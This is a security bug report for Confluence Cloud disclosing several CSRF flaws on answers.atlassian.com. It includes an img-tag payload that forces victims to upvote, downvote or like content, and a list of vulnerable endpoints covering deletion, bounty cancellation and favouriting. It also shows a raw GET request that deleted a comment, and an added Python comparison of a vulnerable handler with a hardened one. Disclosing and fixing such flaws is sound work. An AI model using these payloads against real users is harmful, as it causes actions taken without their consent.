Multiple CSRF vulnerabilities in Question/Answer Threads


    • Severity 3 - Minor

      NOTE: This bug report is for Confluence Cloud. Using Confluence Server? See the corresponding bug report.

      Multiple CSRF vulnerabilities exist on answers.atlassian.com. If an authenticated victim visits a malicious resource controlled by the attacker, the attacker can potentially perform actions such as the following on the victim's behalf:

      Confirmed affected:

      • Upvoting of answers
      • Downvoting of answers
      • Deletion of answers or comments
      • Liking of comments
      • Cancelling of bounties
      • Marking as favourite

      Unconfirmed, but may be possible:

      • Conversion of answers to comments via crafted form
      • Setting and confirming a bounty

      Steps to reproduce:

      Issuing Arbitrary Likes/Upvotes/Downvotes

      1. Find the comment or answer you wish to like/upvote/downvote.
      2. To obtain its ID, search the HTML source for "/vote/" or inspect the comment element and find its ID. It should be in this format "/vote/[ID]/up/"
      3. Once the ID is obtained simply place it in the following "img" tag accordingly: <img src="https://answers.atlassian.com/vote/[ID]/up/"/>
      4. When placed into an HTML file and visited by an authenticated Atlassian Answers victim, regardless of which domain the HTML is hosted on, the comment will be upvoted.
      5. To down vote, change "/up/" to "/down/" accordingly in the src value of the img tag.
      6. In order to make the victim like a comment, change the img's src value to "/like_comment/[id]/" accordingly.

      The following endpoints were identified to be vulnerable:

      /vote/[id]/up/
      /vote/[id]/down/
      /bounty/[id]/cancel/
      /like_comment/[id]/
      /mark_favorite/[id]/
      /delete_comment/[id]/
      /delete/[id]/
      

      The following HTTP request was able to successfully delete a comment made by me, without any prior verification or validation:

      GET /delete_comment/299015/ HTTP/1.1
      Host: answers.atlassian.com
      Connection: keep-alive
      Accept: image/webp,*/*;q=0.8
      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
      DNT: 1
      Accept-Encoding: gzip,deflate,sdch
      Accept-Language: en-US,en;q=0.8
      Cookie: [redacted]
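As an added illustration (not part of this report or of the site's code), the vulnerable pattern beside a hardened handler: the GET /delete_comment/299015/ request above succeeds on the former because the session cookie is the only check, while the latter refuses GET for state changes, rejects cross-origin Origin/Referer values, and validates a per-session token. The session store, cookie name and token field name are constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://answers.atlassian.com"

# Constructed session store: session cookie -> user and per-session CSRF token.
SESSIONS = {"sess-123": {"user": "victim", "csrf": secrets.token_urlsafe(32)}}


@dataclass
class Request:
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)     # POST body fields
    headers: dict = field(default_factory=dict)


def csrf_token_for(session_id: str) -> str:
    """Token the legitimate page would embed in its delete form (hypothetical helper)."""
    return SESSIONS[session_id]["csrf"]


def comment_id(req: Request) -> str:
    # "/delete_comment/299015/" -> "299015"
    return req.path.strip("/").split("/")[-1]


def delete_comment_vulnerable(req: Request) -> str:
    """The pattern the report describes: the session cookie is the only check, so a
    browser-issued GET (e.g. from an <img> on another origin) performs the deletion."""
    if req.cookies.get("sessionid") not in SESSIONS:
        return "403 not logged in"
    return f"200 deleted {comment_id(req)}"


def delete_comment_hardened(req: Request) -> str:
    """Same endpoint with CSRF defences: no state change on GET, same-origin
    Origin/Referer when present, and a synchronizer token compared in constant time."""
    session = SESSIONS.get(req.cookies.get("sessionid"))
    if session is None:
        return "403 not logged in"
    if req.method != "POST":
        return "405 state change requires POST"
    source = req.headers.get("Origin") or req.headers.get("Referer", "")
    if source and not (source == SITE_ORIGIN or source.startswith(SITE_ORIGIN + "/")):
        return "403 cross-origin request rejected"
    submitted = req.form.get("csrf_token", "")       # field name is constructed
    if not hmac.compare_digest(submitted.encode(), session["csrf"].encode()):
        return "403 CSRF token missing or invalid"
    return f"200 deleted {comment_id(req)}"
```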
      

      Assignee: Joe Clark
      Reporter: Shubham